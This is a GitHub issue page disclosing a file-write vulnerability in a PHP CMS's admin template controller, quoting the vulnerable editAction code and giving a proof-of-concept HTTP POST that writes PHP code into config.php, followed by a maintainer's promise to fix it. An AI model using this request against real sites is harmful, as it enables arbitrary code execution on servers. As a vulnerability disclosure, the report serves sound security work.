Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
core\controllers\admin\TemplateController.php
public function editAction() { $theme = $this->get('theme') ? urldecode($this->get('theme')) : ''; if (!file_exists(THEME_PATH . DS . $theme)) { $this->show_message('该模板不存在!', 2, url('admin/template')); } $filename = urldecode($this->get('file')); $dir = $this->get('dir') ? urldecode($this->get('dir')) : '/'; $dir = str_replace(DS . DS, DS, $dir); $filepath = THEME_PATH . DS . $theme . $dir . $filename; $cur_path = DS . THEME_DIR. DS . $theme . $dir . $filename; if (!is_file($filepath)) { $this->show_message($cur_path . '该文件不存在!', 2, url('admin/template/item', array('dir' => $dir))); } if ($this->isPostForm()) { file_put_contents($filepath, stripslashes($_POST['file_content']), LOCK_EX); $this->show_message('提交成功', 1); } if (urldecode(dirname($dir)) == '.') { $top_url = url('admin/template/item', array('theme' => $theme)); } else { $top_url = url('admin/template/item', array('theme' => $theme, 'dir' => urldecode($dir . DS))); } $filecontent = htmlspecialchars(file_get_contents($filepath)); include $this->views('admin/template/add'); }
Although the edit file page does not have an edit button for the PHP file, we can edit the config.php file by constructing a URL
config.php
http://ip:port/index.php?s=admin&c=template&a=edit&theme=default&dir=/&file=config.php
POC
POST /index.php?s=admin&c=template&a=edit&theme=default&dir=/&file=config.php HTTP/1.1 Host: ip:port Content-Length: 57 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie:PHPSESSID=86s25d8kqaptrner2r2iqrqrv7; Connection: close file_content=<?php+phpinfo();?>&submit=%E6%8F%90%E4%BA%A4
The text was updated successfully, but these errors were encountered:
@iami233 Thank you for your feedback. We will deal with this problem in the next version.
Sorry, something went wrong.
17b6005
No branches or pull requests
Vulnerability file:
core\controllers\admin\TemplateController.phpAlthough the edit file page does not have an edit button for the PHP file, we can edit the
config.phpfile by constructing a URLPOC
The text was updated successfully, but these errors were encountered: